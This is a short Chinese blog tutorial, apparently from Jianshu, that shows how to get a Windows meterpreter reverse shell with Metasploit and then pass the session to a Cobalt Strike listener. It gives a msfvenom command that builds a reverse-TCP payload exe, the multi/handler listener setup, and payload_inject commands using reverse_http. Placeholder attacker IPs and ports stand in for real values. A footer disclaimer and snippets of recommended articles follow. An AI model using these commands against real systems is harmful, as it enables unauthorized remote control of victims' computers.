msf派生shell到cs

1 msf获取shell

这里已经在用msf生成了exe

然后直接msf开启监听然后获取shell

msf生成exe的payload为

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

然后msf进行监听开始获取shell

这里设置的端口要与自己生成exe的端口设置相同,否则会监听失败。

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost xx.xx.xx.xx(设置的ip地址)

set port xxxx(设置的端口号)

run

然后在靶机上直接打开exe即可。



2 msf反弹shell到cs

background 

返回到msf操作界面。

如图我们获取的shell为session 1


我们如果要反弹shell 到cs上的话

首先先在cs上设置一个监听。

点击耳麦图标,然后EDIT


这里我选择的是http方式连接,然后这次的port不用设置与生成exe的端口相同,这里我的为1234,随意多少都行。


然后我们开始往cs上派生。

因为cs上设置的为http连接,所以我们下边payload也要对应的设置为reverse_tcp

use exploit/windows/local/payload_inject 

set payload windows/meterpreter/reverse_http

set lhost xx.xx.xx.xx(ip地址)

set lport 1234(cs设置监听的端口)

set session 1(上边我们获取shell的session为1)

run


如图cs上线成功







小白小白小白~

大佬勿喷~

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • CobaltStrike是一款美国RedTeam开发的渗透测试神器,常被业界人称为CS。最近这个工具大火,成为了渗...
    卿酌南烛_b805阅读 5,275评论 0 3
  • CobaltStrike是一款美国RedTeam开发的渗透测试神器,常被业界人称为CS。最近这个工具大火,成为了渗...
    卿酌南烛_b805阅读 5,664评论 3 14
  • msf启动 输入命令msfconsole,-q命令是不显示msflogo 也可以点击左边M图标进行启动 启动成功后...
    1f28dd1475ee阅读 23,837评论 0 6
  • MSF的一些常规操作 一、 Payload 的几种常用生成 1.1 生成windows下的反弹木马msfvenom...
    很有希望的少年阅读 615评论 0 4
  • Msfconsole:是一个一体化集中控制台,允许你访问到几乎所有的MSF框架选项 metasploit就是一个免...
    卿酌南烛_b805阅读 1,257评论 0 1